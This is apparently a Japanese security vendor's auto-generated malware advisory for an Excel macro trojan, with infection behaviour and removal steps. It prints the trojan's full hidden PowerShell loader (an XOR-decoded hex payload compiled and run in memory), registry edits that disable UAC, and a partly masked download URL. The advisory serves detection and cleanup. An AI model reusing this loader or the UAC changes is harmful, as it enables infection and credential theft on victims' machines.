Trojan.X97M.POWLOAD.USMANFOGBW

2020年1月21日

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

マルウェアタイプ: トロイの木馬型
破壊活動の有無: なし
暗号化:
感染報告の有無: はい

概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

詳細

ファイルサイズ 216,064 bytes

タイプ XLS

メモリ常駐はい

発見日 2020年1月21日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

powershell -WindowStyle Hidden function ca7ad {param($xce356)$d33e27='l7d71';$e228c9='';for ($i=0; $i -lt $xce356.length;$i+=2){$ua7b324=[convert]::ToByte($xce356.Substring($i,2),16);$e228c9+=[char]($ua7b324 -bxor $d33e27[($i/2)%$d33e27.length]);}return $e228c9;} $e87317 = '19440d59564c641d4445095a5f42420559031762154410525c4265115945055a011978024301455e1c64014547055401440a19440d59564c641d4445095a4a73580d500a5842185e07440a19440d59564c641d4445095a4a7e7e5742175e5f0b17374e42185209197f09435f3a3b1c42065b580f17075b501f44444f0758565c0155176c205b5d255a145843181f465c541e59015b025e1548725f18451d675e0559100a132b5210674303542553551e52174413456a4447440e5b0d54111f430543580f17014f4509450a177802433443434c45005405541f2d59453c431617530a545105075f1b174343055903175c5b51500e00450c3f735d007e09475e1e434c155a09450a525d5f05461b1129591045483c580d59454c0a44157d0356007b580e450545484e1e3917411955085e524c441056450554445249185216591125591067451e170b0f070906531f4218450d59564c4302035358064d0c6a285b087e5c1c581643194e5c01455f095b57051340172159451e4e34585802435915670545104250006716584509541015183117144253005e0717421856105e524c521c43541e5944555e035b44425408065c1f7802433443434c5c5c06535400571b6425591067451e170e56035900481744055910175a5f015052500d1b4458441817115e5f18170703000a0e501e0a3773085b7801470b454544152f524302520804034253085b1340172159451e4e3458580243591563185b295847097a015a5e1e4e461b113f52107b501f4321454303455951500044011e6c4c44105645055444524918521659111a580d531101040702005a004c7e5f186710451116040103050a1b2d59453c431617560a0f520f1d05591017520a55010354591e5f47440e5b0d54111f430543580f170d59454c405c06095b52071f18177e0a436118454455545d01500f024c0a4458095a525500190f5653565544155453040d065302545d51540f040e075c1518450c0d51190e525501055404590a780243344343426d01455e454c03584503170300525d525d050a117e0a4361184544580654025205045145005405541f0652005a035c041d0f5653565544155653040d065302545a055451045a0705000458035456045d075503044e1e4d0c580a1f0b0009590156020c517e0a436118454a6d541e584d4c5603430b17565b545552085e0c19627802433443434c4e5552570a0f550a19397e0a436118454d020a195e0a431115055c0e035e0a540c580a1f45425408065c1f5e5b0f510103591b1d06540a515c061d5c4f50071d03421017485e0f5d0503451e1f505e18584450060f06010e03574a264e45096c3917520f02500f50514c544f025d1b544f570a1b544f085c4a5f7e5f18671045110155000e04517a0545420456081970005b0b54792b5b0b5550001f571e0a21561644590d5b4a745e1c4e4c545259035c561d5c1b0955555502480418575a5754045d01531f5f0940447e5f186710451903005c02075e024a635e2559100105441e4f07495c07555518405a065308591b571e0a0b0007065455055e17660955275b5809591017475a515c0f0251590140113b5206745d05520a4319450c1743430559031743555300050c2959125e43035909525f18192352452a580853541e6705435944720a41581e580a5a5402434a644109540d565d2a580853541e19254741005e07564505580a735018564d1c13306b060102545100151a0f5653565544155005045e060702034e1e5f41070a0f5c041f285813595d035600715800524c54505b56001f135c035004005c035307535804550f005b07510703595554070408070106575d515156005a0357030058055002005d065c02025c02550f015a020106575c0e5051015d154d1b435553000518576716585209441764450d45107e5f0a584459070f0657515551590140113c450b54541f443743501e432d5957031f160e5508054d0c611e580752421f193743501e434c59070f06575155450c16524519450a1701574a144253005e0717421856105e524c4410455802504454505b56001f4218450d59564c5052045254524d4c4218450d59564c550254045e01570a1300000000004e0c174343055903175e5401010606516410455802504a725c1c431d0c5703454c5e5f18170d0a01575e5850075f545c521f20520a5045040c0d1c0c5e1e1f554818524445550f035c0a72035912524318193058731543011f565a04070f54426411554218450d5956445e4805184006521e0a030f5252005b1c591f520456161e191e530703094c694455570f02560102371f0d180345174117530a545105075f1928525f0b430c6a18574a16524519450a175e5401010606574a19'; $e873172 = ca7ad($e87317); Add-Type -TypeDefinition $e873172; [x64a86d]::w8187ec();
"%Windows%\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%User Temp%\qvbyrswv.cmdline"
%Application Data%\b638fd.exe
%Windows%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RESB79C.tmp" "%User Temp%\CSCB78B.tmp"
"%Application Data%\b638fd.exe"
"%Application Data%\b638fd.exe" 2 2228 1256175
%Program Files%\Internet Explorer\iexplore.exe %Application Data%\b638fd.exe
%Program Files%\Internet Explorer\iexplore.exe /stext "%Application Data%\entqwijmg0.txt"
%Program Files%\Internet Explorer\iexplore.exe /stext "%Application Data%\entqwijmg1.txt"
%Program Files%\Internet Explorer\iexplore.exe /stext "%Application Data%\entqwijmg2.txt"
"%Application Data%\b638fd.exe" 2 316 1261167
"%Application Data%\b638fd.exe" 2 2968 1265380
"%Application Data%\b638fd.exe" 2 2000 1269560
"%Application Data%\b638fd.exe" 2 2616 1275052
"%Application Data%\b638fd.exe" 2 2520 1279061
"%Application Data%\b638fd.exe" 2 1312 1283866
"%Application Data%\b638fd.exe" 2 724 1293163
"%Application Data%\b638fd.exe" 2 644 1299887
"%Application Data%\b638fd.exe" 2 1084 1305222
"%Application Data%\b638fd.exe" 2 1264 1310386
"%Application Data%\b638fd.exe" 2 2400 1325487
%System%\lsass.exe

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。. %Program Files%フォルダは、デフォルトのプログラムファイルフォルダです。C:\Program Files in Windows 2000(32-bit)、Server 2003(32-bit)、XP、Vista(64-bit)、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Program Files"です。また、Windows XP(64-bit)、Vista(64-bit)、7(64-bit)、8(64-bit)、8.1(64-bit)、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Program Files（x86）" です。. %System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

マルウェアは、以下のフォルダを作成します。

%All Users Profile%\Microsoft\User Account Pictures

(註：%All Users Profile%フォルダは、ユーザの共通プロファイルフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\All Users” です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData” です。)

他のシステム変更

マルウェアは、以下のファイルを改変します。

%User Temp%\{username}.bmp

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Security Center
UACDisableNotify = "0"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
EnableLUA = "0"

作成活動

マルウェアは、以下のファイルを作成します。

{malware file path and name}
%Application Data%\entqwijmg0.txt
%Application Data%\entqwijmg1.txt
%User Temp%\1312213.od
%Application Data%\b638fd.exe
%User Temp%\qvbyrswv.dll
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8.pas
%User Temp%\qvbyrswv.0.cs
%User Temp%\qvbyrswv.err
%Application Data%\ut
%User Temp%\qvbyrswv.out
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\{username}.bmp
%User Temp%\qvbyrswv.pdb
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8
%User Temp%\qvbyrswv.cmdline

(註：%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

http://s237799.{BLOCKED}p.ru/bi/bi.exe
{BLOCKED}4.30.19

このウイルス情報は、自動解析システムにより作成されました。

対応方法

対応検索エンジン: 9.850

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

「Trojan.X97M.POWLOAD.USMANFOGBW」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。
検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 3

このレジストリ値を削除します。

[ 詳細 ]

警告：レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center
- UACDisableNotify = "0"

In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- EnableLUA = "0"

手順 4

以下のファイルを検索し削除します。

[ 詳細 ]

コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

{malware file path and name}
%Application Data%\entqwijmg0.txt
%Application Data%\entqwijmg1.txt
%User Temp%\1312213.od
%Application Data%\b638fd.exe
%User Temp%\qvbyrswv.dll
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8.pas
%User Temp%\qvbyrswv.0.cs
%User Temp%\qvbyrswv.err
%Application Data%\ut
%User Temp%\qvbyrswv.out
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\{username}.bmp
%User Temp%\qvbyrswv.pdb
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8
%User Temp%\qvbyrswv.cmdline

マルウェアのコンポーネントファイルの削除：

Windows 2000、XP および Server 2003 の場合：

[スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
[ファイル名のすべてまたは一部]に以下のファイル名を入力してください。
{malware file path and name}
%Application Data%\entqwijmg0.txt
%Application Data%\entqwijmg1.txt
%User Temp%\1312213.od
%Application Data%\b638fd.exe
%User Temp%\qvbyrswv.dll
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8.pas
%User Temp%\qvbyrswv.0.cs
%User Temp%\qvbyrswv.err
%Application Data%\ut
%User Temp%\qvbyrswv.out
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\{username}.bmp
%User Temp%\qvbyrswv.pdb
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8
%User Temp%\qvbyrswv.cmdline
[探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
検索が終了したら、ファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：ファイル名の入力欄のタイトルは、Windowsのバージョンによって異なります。（例：ファイルやフォルダ名の検索の場合やファイル名のすべてまたは一部での検索）

Windows Vista、7、Server 2008、8、8.1 および Server 2012 の場合：

Windowsエクスプローラ画面を開きます。
- Windows Vista、7 および Server 2008 の場合：
  - [スタート]-[コンピューター]を選択します。
- Windows 8、8.1 および Server 2012 の場合：
  - 画面の左隅を右クリックし、[エクスプローラー]を選択します。
[コンピューターの検索]に、以下を入力します。
{malware file path and name}
%Application Data%\entqwijmg0.txt
%Application Data%\entqwijmg1.txt
%User Temp%\1312213.od
%Application Data%\b638fd.exe
%User Temp%\qvbyrswv.dll
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8.pas
%User Temp%\qvbyrswv.0.cs
%User Temp%\qvbyrswv.err
%Application Data%\ut
%User Temp%\qvbyrswv.out
%System Root%\BVTBin\Tests\installpackage\csilogfile.log
%User Temp%\{username}.bmp
%User Temp%\qvbyrswv.pdb
%Application Data%\I3N7F4Q1-G886-H6L4-T4D2-R5G6A0T1T4B8
%User Temp%\qvbyrswv.cmdline
ファイルが表示されたら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：Windows 7 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 5

以下のフォルダを検索し削除します。

[ 詳細 ]

註：このフォルダは、隠しフォルダとして設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

%All Users Profile%\Microsoft\User Account Pictures

手順 6

最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.X97M.POWLOAD.USMANFOGBW」と検出したファイルはすべて削除してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

手順 7

以下のファイルをバックアップを用いて修復します。マイクロソフト製品に関連したファイルのみに修復されます。このマルウェアが同社製品以外のプログラムをも削除した場合には、該当プログラムを再度インストールする必要があります。

%User Temp%\{username}.bmp

ご利用はいかがでしたか？　アンケートにご協力ください